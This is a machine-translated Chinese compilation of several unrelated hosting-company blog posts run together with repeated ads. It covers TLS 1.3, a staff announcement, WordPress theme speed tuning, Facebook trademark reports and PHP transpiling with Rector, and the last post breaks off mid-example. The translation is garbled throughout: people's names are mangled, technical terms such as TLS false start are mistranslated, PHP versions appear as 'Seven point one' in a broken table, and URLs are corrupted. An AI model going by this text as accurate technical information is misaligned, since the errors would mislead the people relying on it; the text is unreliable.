- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
TLS 1.3 概述—更快、更安全
距离上一次加密协议更新已经过去了八年多,但截至 2018 年 8 月,最终版本 TLS 1.3 现已发布。👏对于 WordPress 社区和 Kinsta 的客户来说,令人兴奋的是 TLS 1.3 包含了很多安全性和性能的改进。随着 2015 年末 HTTP/2 协议更新,以及 2018 年的 TLS 1.3,加密连接现在比以往任何时候都更加安全和快速。阅读下面更多关于 TLS 1.3 的变化,以及作为一个 WordPress 网站的所有者,它将如何使你受益。
什么是 TLS?
TLS 代表传输层安全,是 SSL(安全套接字层)的继任者。TLS 提供 web 浏览器和服务器之间的安全通信。连接本身是安全的,因为对称加密用于加密传输的数据。密钥是为每个连接唯一生成的,并且基于会话开始时协商的共享密钥,也称为 TLS 握手。
Support
许多基于 IP 的协议,如 HTTPS、 SMTP 、POP3、FTP 都支持 TLS 加密数据。
'TLS 1.3: Faster, Safer, Better, Everything.' 🚀 -- Filippo ValsordaClick to Tweet
Web 浏览器使用一个 SSL 证书,这允许它们识别出它属于一个数字签名的认证机构。从技术上来说,这些证书也被称为 TLS 证书,但是大多数 SSL 提供者坚持使用术语“SSL 证书”,因为这通常更广为人知。
SSL/TLS 证书提供了许多人在浏览器地址栏中看到的 HTTPS 背后的魔力。
TLS 1.3 与 TLS 1.2
互联网工程任务组(IETF)是负责定义 TLS 协议的组织,该协议已经经历了多次不同的迭代。TLS 的前一版本 TLS 1.2 是在 RFC 5246 中定义的,并且在过去的八年中被 T2 大多数的网络浏览器使用。2018 年 3 月 21 日, TLS 1.3 已经定稿,历经 28 稿。截至 2018 年 8 月,TLS 1.3 的最终版本现已发布( RFC 8446 )。
像 Cloudflare 这样的公司已经在向他们的客户提供 TLS 1.3。 Filippo Valsorda 就 TLS 1.2 和 TLS 1.3 之间的差异进行了精彩的演讲(见下面的演示)。简而言之,TLS 1.3 相对于 TLS 1.2 的主要优势是更快的速度和更好的安全性。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
TLS 1.3 的速度优势
当涉及到 web 性能时,TLS 和加密连接总是会增加一些开销。 HTTP/2 无疑有助于解决这个问题,但是 TLS 1.3 通过诸如 TLS 错误开始和零往返时间(0-RTT)等特性来帮助加速加密连接。
少花点时间担心网站安全和性能,多花点时间发展业务。免费试用 kin sta。
简单来说,在 TLS 1.2 中,需要两次往返才能完成 TLS 握手。有了 1.3,它只需要一次往返、和,从而将加密延迟减少一半。这有助于那些加密的连接感觉比以前更快一点。
TLS 1.3 handshake performance
的另一个好处是,在某种意义上,它记得!在您以前访问过的网站上,您现在可以在第一封邮件中向服务器发送数据。这被称为“零往返”(0-RTT)。是的,这也缩短了加载时间。
TLS 1.3 比 1.2 快多了…显示 TLS 握手时间中位数的 RUM 数据(30 天)# web perf# istlsfast yetpic.twitter.com/Mc4RHwg8Vt
——Tim verre corner(@ timvercorner)2019 年 5 月 16 日
欢迎 Tom Sepper 成为 Kinsta 的新任支持总监
我们非常高兴地欢迎托管行业的资深人士汤姆·赛普(Tom Sepper)担任 Kinsta 的新任支持总监。他将负责我们支持部门的日常运作,以确保随着 Kinsta 的不断发展,每一位客户都能得到应有的关注。对我们来说,没有什么比我们支持的质量更重要,这也是我们在竞争中脱颖而出的原因。
见见汤姆
Tom 在虚拟主机和 IT 行业拥有超过 16 年的工作经验,其中大部分时间是在管理岗位上与远程团队一起工作。你也可以认为他是一个“百事通”,因为他什么都干过,包括运营、客户服务、项目管理、市场营销和人力资源。
Tom 带着丰富的高级行业经验来到我们这里。在他工作过的公司中:
- Site5.com 的首席运营官,这是一家从 1998 年开始运营的虚拟主机提供商。
- 的幕僚长 Pressed】,这是一个白色标签管理的 WordPress 托管平台,于 2017 年被 Envato 收购。
- 加拿大托管服务提供商HostPapa****的首席运营官。
*** PowWeb 的社区和文档经理,这是一家从 1999 年开始运营的虚拟主机提供商。**
**汤姆来自伟大的得克萨斯州(达拉斯/沃思堡地区)。🤠他毕业于德克萨斯理工大学,获得了工商管理学士学位。他有家室,是小熊队的铁杆粉丝,也是德州扑克迷。
客户体验一直是我的激情所在,当我与 Kinsta 高管讨论这个机会时,很明显我们围绕客户体验和文化的理想完全一致。我很高兴能把我的经验和想法带到 Kinsta 团队,帮助建立已经到位的惊人基础!汤姆
不管你有什么问题,你可以打赌汤姆以前也遇到过。我们对他为我们团队增加的专业知识和经验的广度感到兴奋。
想打个招呼吗?你可以在领英或推特上与汤姆联系。或者在下面给他留个欢迎的。
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。**
如何安装和优化整个 WordPress 主题
有很多关于大型多用途 WordPress 主题的误解,比如 Avada 和 X 主题,它们可能会让你的网站爬行。诚然,大多数多用途主题确实有些臃肿(尤其是与 WooCommerce 搭配时),但如果优化得当,它们可以快速加载。所以今天我们将深入研究一下多用途的 Total WordPress 主题,看看我们能以多快的速度将它加载到 Kinsta 的服务器上。这不是你的典型 WordPress 主题的简单回顾,我们将把整个 WordPress 主题放入 ringer!
- WordPress 的总主题是什么?
- 新 WordPress 安装
- 安装总主题
- 优化全部 WordPress 主题
总 WordPress 主题
首先,整个 WordPress 主题是由 WPExplorer 的团队创建的,他们也经营着一个流行的 WordPress 博客,你们中的许多人可能在某个时候读过这个博客。目前在 theforest上售价 59.00 美元,12 个月的支持费用为 17.63 美元。这是一个现代的多功能主题,可以很容易地用于任何类型的 WordPress 站点,从在线商店(支持 WooCommerce ),到博客,论坛(支持 bbPress ),甚至新闻网站。当谈到像这样的大型多用途主题时,真的什么都有可能。如果你能想象它,你就能建造它。查看一些使用总主题的网站的真实例子。总站点有各种形状和大小,所以如果你想知道一个站点是否使用总主题,看看我们的主题检测工具。
特征
因为这是一个多用途的主题,它有很多特点!我们不会一一介绍,但有几个重要特性需要注意:
- WPML 兼容–使翻译更加容易
- 拖放包含 90 多个构建块的页面生成器(可视化编辑器)
- 包括旋转、层滑块和自定义文章类型
- 子主题兼容并支持 RTL
- SEO 优化,跨浏览器兼容,对移动优先索引完全响应
- 40 多个带有 XML 演示数据的预建样式演示,让您快速上手
- 主题定制超过 300 个主题选项,易于改变一切,如谷歌字体
- 兼容所有流行的 WordPress 插件,如 Yoast SEO
- 开发者直接提供免费主题更新和支持
全新 WordPress 安装
我们开始在 Kinsta(美国中部谷歌云位置)上安装一个新的 WordPress,并安装了默认的 Twenty 主题。SSL 已设置,HTTPS 已启用。我们想在此之前先运行一些测试,这样我们就能确切地知道整个主题增加了多少加载时间。我们在 Pingdom 上运行了 5 个速度测试,取平均值。正如你在下面看到的,我们新安装的时钟为 383 毫秒。
需要在这里大声喊出来。Kinsta 太神奇了,我用它做我的个人网站。支持是迅速和杰出的,他们的服务器是 WordPress 最快的。
请务必查看我们关于【Pingdom 如何工作和理解瀑布分析的深入教程。
安装全部 WordPress 主题
我们要做的第一件事是安装整个 WordPress 主题并导入虚拟数据。您可以遵循他们的安装文档或遵循我们下面的步骤。
第一步
你可以在 ThemeForest 购买整个 WordPress 主题。在本教程中,我们将使用虚拟数据来提高速度,因此我们选择“所有文件&文档”来下载。
第二步
接下来,在你的 WordPress 仪表盘中点击外观下的主题。点击“添加新的”,然后“上传主题。”您将需要选择主题文件夹中的“Total.zip”文件。
\themeforest-6339019-total-responsive-multipurpose-wordpress-theme\Total-3.6.0\Installable-Theme\Total.zip
根据你的 WordPress 主机的速度,安装可能需要几秒钟。
第三步
然后点击“激活”
第四步
总的主题需要几个插件,你会想安装访问所有的功能包括在内。选择推荐的插件并点击“安装”
第五步
然后我们需要安装演示数据。在“Demo Importer”下,单击“Base Lite”主题。你可以做整个“基地”主题,但这是不推荐的,因为它非常大。基本精简版是一个稍微精简的版本。
第六步
然后它会提示你安装“WooCommerce”如果你不使用它,我们建议禁用它,因为 WooCommerce 会增加不必要的负载。然而,对于本教程,我们将启用它,以便我们可以在以后优化它。只需点击它,它就会安装,然后点击“下一步。”
第七步
如果是全新安装,请选择所有内容,然后单击“确认导入”根据你的 WordPress 主机的速度,可能需要几分钟来导入所有的内容。在 Kinsta 的服务器上,只需要大约 20 秒。
就是这样!你的演示数据现在已经导入,你的 WordPress 站点应该看起来像下面的基本 Lite 演示。
可选–woo commerce 设置
如果您使用 WooCommerce,系统会提示您完成安装向导。查看我们关于如何设置 WooCommerce 的深入教程。我们为下面的例子设置了 WooCommerce。
优化整个 WordPress 主题
现在是有趣的部分!我们将带你了解如何优化 WordPress 的主题。首先,我们需要从基本速度开始。所以我们在 Pingdom 上运行了 5 个速度测试,取平均值。正如您在下面看到的,安装了演示数据的基线速度为 1.06 秒,有 54 个 HTTP 请求,总页面大小为 1.4 MB。
步骤 1–本地同步 Google Analytics(可选)
几乎每个人都使用 Google Analytics ,所以我们在测试中设置它是公平的,因为 99%使用总主题的人可能都在运行它。我们也会的。免费的 Complete Analytics 优化套件插件允许你在本地同步你的 Google Analytic 的脚本,从而可以稍微加快速度。
T2】注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
我们说这是可选的,因为谷歌没有正式推荐这种方法,但是,我们已经在几个大流量的网站上使用了这种方法,效果很好。通过在本地同步您的 Google Analytic 脚本,您可以帮助提高浏览器缓存警告的利用率和速度,因为用户的浏览器不必往返从 Google 的外部服务器下载文件。下面是一个安装了上述插件的区别的例子。请随意在您自己的站点上尝试并运行您自己的测试。
普通谷歌分析安装
首先,我们在正常安装了 Google Analytics 的 Pingdom 上运行了 5 个测试。正如你所看到的,仅仅添加 Google Analytics 就增加了大约 0.25 秒的总加载时间和 4 个额外的 HTTP 请求。WPExplorer 的团队在多用途总体主题上做得很好,因为这些都是非常快的加载时间。当然,Kinsta 的服务器在性能方面进行了大量优化。Kinsta 使用服务器级缓存,所以不需要缓存插件。
本地同步的谷歌分析
然后,使用上面提到的 CAOS 插件,我们将其配置为在本地同步 Google Analytics。然后我们在 Pingdom 上运行了另一个 5 测试。这使我们的 HTTP 请求总数减少了 2 个,装载时间减少到 1.26 秒。这不是很多,但略快于正常的谷歌分析设置。
步骤 2–禁用嵌入
如果你不使用自动嵌入,首先要做的是禁用嵌入。这将在你的 WordPress 站点上生成一个额外的 HTTP 请求(如下所示)来加载 wp-embed.min.js 文件。这在每一页上都有体现。
虽然这个文件只有 1.2 KB,但是随着时间的推移,这样的东西会越来越多。请求本身有时比内容下载量更大。最简单的方法是简单地安装一个名为的免费插件,禁用嵌入。
T2】如果你对替代方法感兴趣,请看我们关于如何禁用嵌入的深度文章。然后我们在 Pingdom 上运行了另一个 5 测试。这使我们的 HTTP 请求总数减少了 1 个,装载时间减少到 1.25 秒。再次提醒你,当我们结束的时候,所有这些事情都会累积起来。
步骤 3–从 URL 中删除查询字符串
另一个常见问题是处理查询字符串。你的 CSS 和 JavaScript 文件通常在它们的 URL 末尾有文件版本,比如 https://domain.com/file.min.css?ver=4.5.3.一些服务器和代理服务器不能缓存查询字符串。因此,通过删除它们,您有时可以改善您的缓存。WordPress 中有一些免费的插件,比如查询字符串移除器,可以自动为你完成这项工作。
Struggling with downtime and WordPress problems? Kinsta is the hosting solution designed to save you time! Check out our features
T2】然后我们在 Pingdom 上运行了另一个 5 测试。正如你所看到的,它根本没有提高我们的速度,但它确实提高了我们的性能等级。从 93 分提高到 99 分。
参见我们关于如何从 URL 中移除查询字符串的深入教程。
步骤 4–图像优化
下一步是在我们的 WordPress 媒体库上运行图像优化。这是迄今为止你能做的最重要的优化之一,因为图片平均占一个页面重量的 60%以上。尤其是当你在总主题的滑块中使用大图片的时候。在这个例子中,我们使用 WP Rocket 团队的 Imagify 图像优化插件。
T2】在插件中,我们进入媒体库下的“批量优化”。我们保留积极设置的默认压缩级别,并单击“全部图像”我们从 11.89mb 中节省了 7.63mb!只需轻轻一点。
然后我们在 Pingdom 上运行了另一个 5 测试。这又一次减少了我们的加载时间,并使我们的页面大小减少了 30%。虚拟数据中包含的默认图像非常小,因此在未优化的现场运行时,您会很容易看到更快的性能提升。
步骤 5–启用 CDN
下一步是在网站上启用一个内容交付网络(CDN) 。这使我们能够在全球范围内更快地提供我们的内容。
Kinsta 客户可以使用其设置附带的 Kinsta CDN。这与代码缩小功能一起被直接内置在 MyKinsta 仪表板中。这使得客户只需简单的点击就可以实现 CSS 和 JavaScript 的自动缩小,从而有效地加速他们的网站,而无需手动操作。
第 6 步-禁用主页上不必要的脚本
另一种提高网站速度的方法是禁止不必要的脚本加载到主页和网站的其他地方。WooCommerce 有几个不需要加载到主页上的脚本。如果你没有使用 lightbox 功能,你也可以禁用它。为此,我们使用了高级的 Gonzalez 插件,它允许我们单独禁用我们选择的脚本,如下所示。
//wpdev.ink/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js
//wpdev.ink/wp-content/plugins/woocommerce/assets/css/woocommerce.css
//wpdev.ink/wp-content/themes/Total/assets/css/wpex-woocommerce-responsive.css
//wpdev.ink/wp-content/themes/Total/assets/lib/ilightbox/minimal/ilightbox-minimal-skin.css
然后我们在 Pingdom 上运行了另一个 5 测试。这将我们的加载时间缩短到了 1.18 秒,并将 HTTP 请求的总数减少了 5。
步骤 7–优化滑块转速
我们并不热衷于滑块,但它们仍然被广泛使用。谢天谢地,你可以在滑块旋转设置中做一些事情来加速它。我们建议同时打开“将 JavaScript 插入页脚”和“推迟 JavaScript 加载”选项。
然后我们在 Pingdom 上运行了另一个 5 测试。这使我们的加载时间缩短到了 1.15 秒。
我们发现 Slider Revolution 的一个问题是,默认情况下,它不会加载 CDN 的所有资产。我们发现以下三个脚本仍在从我们的原始服务器加载:
https://wpdev.ink/wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.slideanims.min.js
https://wpdev.ink/wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.layeranimation.min.js
https://wpdev.ink/wp-content/plugins/revslider/public/assets/js/extensions/revolution.extension.navigation.min.js
这可能是插件开发者应该解决的问题。
记得 HTTP/2 吗
同样重要的是要记住,有了 HTTP/2 ,不再需要连接(组合)脚本。在某些情况下,它甚至可以降低你的网站速度。为了测试这一点,我们安装了免费的自动优化插件,启用 HTML/CSS/JS 优化,以及 CDN 选项。然后我们在 Pingdom 上运行了另一个 5 测试。最后其实对站点一点帮助都没有,而且其实更慢。有了 HTTP/2 和并行性,它在快速加载多个小文件方面做得很好。然而,如果你还没有运行在 HTTPS 之上,这是 HTTP/2 所要求的,自动优化插件会有很大帮助!
摘要
总之,我们对 WPExplorer 团队的整个 WordPress 主题印象深刻。由于 Kinsta 的快速服务器,即使是一个新安装的谷歌分析也能以 1.26 秒的速度运行。一旦稍加优化,对于一个安装了 WooCommerce 的网站来说,1.15 秒的加载时间是相当快的!如果这个 WordPress 主题评论有帮助,请在下面的评论中告诉我们。如果你愿意的话,我们可以对阿瓦达主题或 X 主题做进一步的探讨。
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
如何以及为什么提交脸书商标侵权报告
从商标侵权到内容盗窃,这些只是随着你的品牌越来越大,你必须处理的一些麻烦。在过去的一年里,Kinsta 的内容被盗的次数多得数不清。事实上,提交 DMCA 撤下请求已经不幸成为我们的一项常规持续任务。
越大越不好。然而,重要的是通过正当的法律渠道采取行动,以保护你的品牌形象并确保潜在客户只看到你想让他们看到的东西。在某种程度上,你几乎可以将商标侵权报告视为转化率优化的一种形式。
今天,我们将讨论为什么不应该留下商标侵权的内容,并向您介绍如何提交脸书商标侵权报告。虽然这可能不是最吸引人的话题,但你很可能最终不得不在某个时候为你的品牌做同样的事情。
什么是商标?
商标可以是代表你的品牌的任何东西,比如一个词、企业名称、短语、符号,甚至是一个设计(标志)。它可以合法注册和保护,因为它是用来区分你的服务和/或商品从另一个。与专利和版权不同,商标不会过期。
Support
为什么有人会侵犯 Brand 的商标?
正如你可能猜到的,我们的“金斯塔”品牌名称是注册商标。所以不允许别人用这个。不幸的是,这并不总是清楚的,或者也许个人只是不在乎,因为他们试图赚快钱。
人们为什么要这样做?在我们今天要展示的例子中,Kinsta 的一个分支机构创建了一个名为“Kinsta Hosting”的脸书页面(如下所示)。目的是让他们看起来像是 Kinsta,并从我们的网站定期发布内容更新。问题是,他们会将他们的 Kinsta 附属链接附加到所有东西上,试图赚取佣金。在 99%的情况下,你可以放心地打赌,有人试图冒充你的原因是为了赚钱。
Facebook page trademark infringement (Page not created by Kinsta)
我们总是喜欢假定人们是无辜的。所以在这种情况下,我们给脸书页面的所有者发了信息,指示他们立即删除该页面。首先,它在 Kinsta 附属条款中明确陈述了以下内容:
代销商不得在网址或在线广告中使用 Kinsta.com 或金士达的商标名称。
我们给了他们两个星期的时间来回复,但没有收到任何回复。当然,我们可以禁止他们加入我们的会员计划。然而,仅仅禁止它们是不够的,因为脸书页面仍然存在。下面,我们将与您分享为什么这样做是一个坏主意。
商标侵权脸书网页如何伤害你的品牌
起初,你可能不会认为放弃一个侵犯脸书·佩奇的商标是什么大不了的事情。然而,让我们向您展示它之所以重要的四个主要原因。这同样适用于所有的社交网络,不仅仅是脸书。
1.它出现在脸书的搜索结果中
正如你在下面看到的,这个人创建的脸书页面出现在搜索结果中。在我们的例子中,如果人们搜索“Kinsta”或“Kinsta hosting ”,这个人的页面就会出现,有时在我们的上面或下面。😠这太可怕了!如果有人专门搜索我们的公司,我们绝不希望潜在客户登陆不受我们控制的另一个页面。
Facebook search results trademark
2.它在谷歌中被编入索引,并在 URL 中使用商标名称
脸书网页是在谷歌索引。这又是一种处理搜索结果的方法。如果有人在谷歌搜索你的脸书页面,你不希望别人出现。另一方面,它还在脸书网页的 URL 中使用了商标名称。当涉及到 URL 时,你应该尽可能地保护你的商标。
Facebook page URL trademark
3.当试图给你的品牌贴标签时,人们会感到困惑
标签功能被许多不同的社交媒体网络使用,包括脸书。基本上它是如何工作的,如果有人想让你看到他们分享的东西,他们会用@符号和你的品牌名称来标记你的公司。如果有人创建了额外的脸书网页来模仿你的品牌,人们可能会标记错误的网页,而你会完全错过这些提及。
Facebook tagging
有时,当人们有问题时,他们也会给你贴标签。你最不想看到的就是他们给别人贴标签,而你却永远无法回应。如此简单的事情可能会让你失去一个客户。
4.您无法控制页面的内容或品牌
虽然有点显而易见,但你需要关闭这些页面的最后一个原因是,你将无法控制内容和品牌。以下是此人玷污我们品牌的几种方式:
- 他们上传了一个位置或大小不正确的徽标。
- 他们使用了两年多前的脸书页面横幅。
- 他们的页面没有评级。这立刻给人的印象是我们公司不是很大,或者没有得到客户的任何正面评价。
- 这个人分享的内容不是最新的,也不是我们在脸书通常使用的格式。
Facebook branding
现在你已经听到了一些你应该确保把这些页面拿下来的理由,让我们来看看到底该怎么做。
注册订阅时事通讯
想知道我们是怎么让流量增长超过 1000%的吗?
加入 20,000 多名获得我们每周时事通讯和内部消息的人的行列吧!
如何提交脸书商标侵权报告
脸书非常重视商标侵权,在我们提交的所有报告中,他们总是在 24 小时内删除令人不快的内容和/或页面。至少可以说令人印象深刻。
第一步
第一步是前往脸书,填写他们的商标报告表。在表格中,他们给你以下选择:
- 我的账户被黑了
- 我无法访问以前管理的组或页面
- 我发现了一个伪装成我的虚假个人资料
- 我被欺负或骚扰
- 我发现不适当或侮辱性的内容
- 我想为我的生意申请一页
- 我发现了我认为侵犯我版权的内容
- 我发现了我认为侵犯了我的商标的内容(这就是我们在本例中使用的内容)
Content which infringes my trademark
正如您在上面看到的,该表单还可以用于版权投诉和其他问题。
第二步
第二步,填写你公司的联系方式。
Facebook trademark infringement contact information
第三步
下一步是提供您的商标信息。请参见下文,了解如何找到您的商标信息。
Struggling with downtime and WordPress problems? Kinsta is the hosting solution designed to save you time! Check out our features
Facebook trademark information
有几个地方可以找到你的商标信息。这将取决于你的商标和公司注册地。如果你的商标是在美国注册的,它很可能会出现在美国专利商标局的商标数据库中。
在英国,可以使用 GOV.UK 。你也可以查看 WIPO 全球品牌数据库。否则,你可以在谷歌上快速搜索你自己国家的商标数据库。
在这个例子中,我们将使用 USPTO 商标数据库。要开始搜索,请点击菜单中的“商标”,然后点击“搜索商标数据库”
Search trademark database
点击“基本单词标记搜索(新用户)”的搜索选项。
Basic word mark search
然后输入贵公司的品牌名称作为搜索词。然后,它将返回现有的商标。
Trademark search term
在商标页,你会找到一个商标注册号码,你需要填写脸书表格。他们还为您提供了附加 PDF 或 PNG 商标页面的选项。我们建议这样做,因为我们发现一些在线商标数据库在直接链接到搜索结果方面不能正常工作。
第四步
在最后一步,脸书将询问您想要报告的内容的位置。在这种情况下,它是“整个页面、组或简档”只需复制并粘贴页面的 URL。
点击提交按钮后,你会收到一封来自脸书的电子邮件,其中附有报告#并确认他们会调查你的情况。
Facebook intellectual property report
我们已经提交了多份商标侵权报告,脸书总是在 24 小时内做出回应,并删除违规页面。相比其他类似商标侵权举报的网络,脸书确实是最快的之一!
Trademark removal success Facebook
内容被拿下后会怎么样?它将不再可访问,并将显示以下消息:“对不起,此内容现在不可用。”一旦你看到这个,它已经从脸书搜索结果中删除,不再是可标记的。几天后,它将从谷歌的索引中消失。
Facebook trademark page removed
摘要
我们的建议是,你不应该忽视商标侵权。他们玷污你的品牌,迷惑潜在客户。谢天谢地,脸书让举报商标侵权变得超级简单!只需几个简单的步骤,您就可以立即删除不良内容或页面。
你是否处理过脸书商标侵权或个人假冒你的品牌?我们希望在下面的评论中听到你对这个话题的想法。
让你所有的应用程序、数据库和 WordPress 网站在线并在一个屋檐下。我们功能丰富的高性能云平台包括:
- 在 MyKinsta 仪表盘中轻松设置和管理
- 24/7 专家支持
- 最好的谷歌云平台硬件和网络,由 Kubernetes 提供最大的可扩展性
- 面向速度和安全性的企业级 Cloudflare 集成
- 全球受众覆盖全球多达 35 个数据中心和 275 多个 pop
在第一个月使用托管的应用程序或托管的数据库,您可以享受 20 美元的优惠,亲自测试一下。探索我们的计划或与销售人员交谈以找到最适合您的方式。
PHP 代码编译终极指南
原文:# t0]https://kinta . com/blog/transiling-PHP/
在理想的情况下,我们应该为我们所有的网站使用 PHP 8.0 (撰写本文时的最新版本),并且在新版本发布后立即更新。然而,开发者经常需要使用以前的 PHP 版本,比如为 WordPress 创建一个公共插件,或者使用阻碍升级网络服务器环境的遗留代码。
在这些情况下,我们可以放弃使用最新 PHP 代码的希望。但是有一个更好的选择:我们仍然可以用 PHP 8.0 编写我们的源代码,并将其转换到以前的 PHP 版本——甚至是 PHP 7.1。
在本指南中,我们将教你所有你需要知道的关于编译 PHP 代码的知识。
T3】
什么是运输?
Transpiling 将源代码从编程语言转换成相同或不同编程语言的等价源代码。
Transpiling 在 web 开发中并不是一个新概念:客户端开发人员很可能熟悉 Babel ,一个 JavaScript 代码的 transpiler。
Babel 将 JavaScript 代码从现代 ECMAScript 2015+版本转换为兼容旧浏览器的遗留版本。例如,给定一个 ES2015 箭头函数:
[2, 4, 6].map((n) => n * 2);
…Babel 将把它转换成它的 ES5 版本:
Kinsta 把我宠坏了,所以我现在要求每个供应商都提供这样的服务。我们还试图通过我们的 SaaS 工具支持达到这一水平。
[2, 4, 6].map(function(n) {
return n * 2;
});
什么是 Transpiling PHP?
web 开发中潜在的新东西是传输服务器端代码的可能性,特别是 PHP。
转换 PHP 和转换 JavaScript 的工作方式是一样的:现代 PHP 版本的源代码被转换成旧版本的等价代码。
按照前面的例子,PHP 7.4 中的一个箭头函数:
$nums = array_map(fn($n) => $n * 2, [2, 4, 6]);
…可以转换成相当的 PHP 7.3 版本:
$nums = array_map(
function ($n) {
return $n * 2;
},
[2, 4, 6]
);
箭头函数可以被转换,因为它们是语法糖,即产生现有行为的新语法。这是唾手可得的果实。
然而,也有一些新的特性创造了一种新的行为,因此,对于以前的 PHP 版本,将不会有等价的代码。PHP 8.0 中引入的联合类型就是这种情况:
function someFunction(float|int $param): string|float|int|null
{
// ...
}
在这些情况下,只要新特性是开发所需要的,而不是生产所需要的,就仍然可以进行转换。然后,我们可以简单地从编译后的代码中完全删除这个特性,而不会产生严重的后果。
一个这样的例子是联合类型。这个特性用于检查输入类型和它提供的值之间没有不匹配,这有助于防止错误。如果与类型有冲突,那么在开发过程中就已经有错误了,我们应该在代码进入生产阶段之前发现并修复它。
因此,我们可以从生产代码中删除该特性:
function someFunction($param)
{
// ...
}
如果错误仍然发生在生产中,抛出的错误消息将没有联合类型那么精确。然而,这种潜在的缺点首先被能够使用联合类型所抵消。
传输 PHP 代码的优势
Transpiling 使人们能够使用最新版本的 PHP 编写应用程序,并发布一个在运行旧版本 PHP 的环境中也能工作的版本。
这对于开发人员为遗留内容管理系统(CMS)创建产品特别有用。例如,WordPress 仍然官方支持 PHP 5.6 (尽管它推荐 PHP 7.4+)。运行 PHP 5.6 到 7.2 版本的 WordPress 网站的比例高达 34.8%,而运行 than 8.0 以外的任何版本的 WordPress 网站的比例高达 99.5%:PHP 5.6 到 7.2 版本都已停产,这意味着它们不再接收安全更新。
WordPress usage stats by version. Image source: WordPress
因此,面向全球受众的 WordPress 主题和插件很可能会使用旧版本的 PHP 进行编码,以增加它们可能达到的范围。多亏了 transpiling,这些可以用 PHP 8.0 编码,并且仍然可以在旧的 PHP 版本中发布,从而面向尽可能多的用户。
事实上,任何需要支持除最新版本之外的任何 PHP 版本的应用程序(即使在当前支持的 PHP 版本范围内)都可以从中受益。
Drupal 就是这种情况,需要 PHP 7.3 。多亏了 transpiling,开发人员可以使用 PHP 8.0 创建公开可用的 Drupal 模块,并使用 PHP 7.3 发布它们。
另一个例子是为由于这样或那样的原因而不能在其环境中运行 PHP 8.0 的客户创建定制代码。尽管如此,多亏了 transpiling,开发人员仍然可以使用 PHP 8.0 编写他们的可交付成果,并在那些遗留环境中运行它们。
何时传输 PHP
PHP 代码总是可以被编译,除非它包含一些 PHP 特性,而这些特性在以前的 PHP 版本中没有对等的特性。
PHP 8.0 中引入的属性可能就是这种情况:
#[SomeAttr]
function someFunc() {}
#[AnotherAttr]
class SomeClass {}
在前面使用箭头函数的例子中,代码可以转换,因为箭头函数是语法糖。相反,属性创造了全新的行为。这种行为也可以在 PHP 7.4 和更低版本中重现,但只能通过手动编码来实现,也就是说,不能基于工具或过程自动实现(人工智能可以提供解决方案,但我们还没有做到这一点)。
用于开发的属性,如 #[Deprecated] ,可以像删除联合类型一样被删除。但是在生产中修改应用程序行为的属性不能被删除,也不能被直接转换。
到目前为止,没有一个 transpiler 可以获取带有 PHP 8.0 属性的代码,并自动生成其等价的 PHP 7.4 代码。因此,如果你的 PHP 代码需要使用属性,那么移植它将会很困难或者不可行。
可以移植的 PHP 特性
这些是 PHP 7.1 和更高版本中目前可以移植的特性。如果您的代码只使用这些特性,您可以享受 transpiled 应用程序将工作的确定性。否则,您需要评估转换后的代码是否会产生错误。
| PHP 版本 | 特征 |
|---|---|
| Seven point one | 一切 |
| Seven point two | –object类型 |
| –参数类型加宽 | |
–PREG_UNMATCHED_AS_NULL标志在preg_match |
|
| Seven point three | –list()/数组析构中的引用赋值 ( 内部除外foreach—# 4376) |
| –灵活的 Heredoc 和 Nowdoc 语法 | |
| –函数调用中的尾随逗号 | |
–set(raw)cookie接受$option 参数 |
|
| Seven point four | –类型化属性 |
| –箭头函数 | |
| –零合并赋值运算符 | |
| –数组内部解包 | |
| –数字文字分隔符 | |
–strip_tags()带数组标记名 |
|
| –协变返回类型和逆变参数类型 | |
| Eight | –联合类型 |
–mixed伪类型– |
|
––static返回类型 |
|
––::class对象上的魔常数––match表达式 |
|
––catch异常仅通过类型 |
|
| –空安全运算符 | |
| –类构造函数属性提升 | |
PHP 传输程序
目前,有一个工具可以移植 PHP 代码: Rector 。
Rector 是一个 PHP 重构工具,它根据可编程的规则转换 PHP 代码。我们输入源代码和组规则运行,Rector 将转换代码。
Rector 通过命令行操作,通过 Composer 安装在项目中。执行时,Rector 将输出转换前后代码的“差异”(绿色表示添加,红色表示删除):
“diff” output from Rector
要转换到哪个版本的 PHP
要跨 PHP 版本传输代码,必须创建相应的规则。
今天,Rector 库包含了 PHP 8.0 到 7.1 范围内的大多数代码转换规则。因此,我们可以可靠地将 PHP 代码移植到 7.1 版本。
从 PHP 7.1 到 7.0 和从 7.0 到 5.6 的也有规则,但这些并不详尽。完成它们的工作正在进行中,所以我们可能最终将 PHP 代码移植到 5.6 版本。
传输与反向传输
反向移植类似于传输,但更简单。反向移植代码不一定依赖于语言的新特性。相反,可以简单地通过复制/粘贴/改编该语言新版本的相应代码,向该语言的旧版本提供相同的功能。
例如,函数str_contains是在 PHP 8.0 中引入的。PHP 7.4 及以下版本的相同功能可以像这样轻松实现:
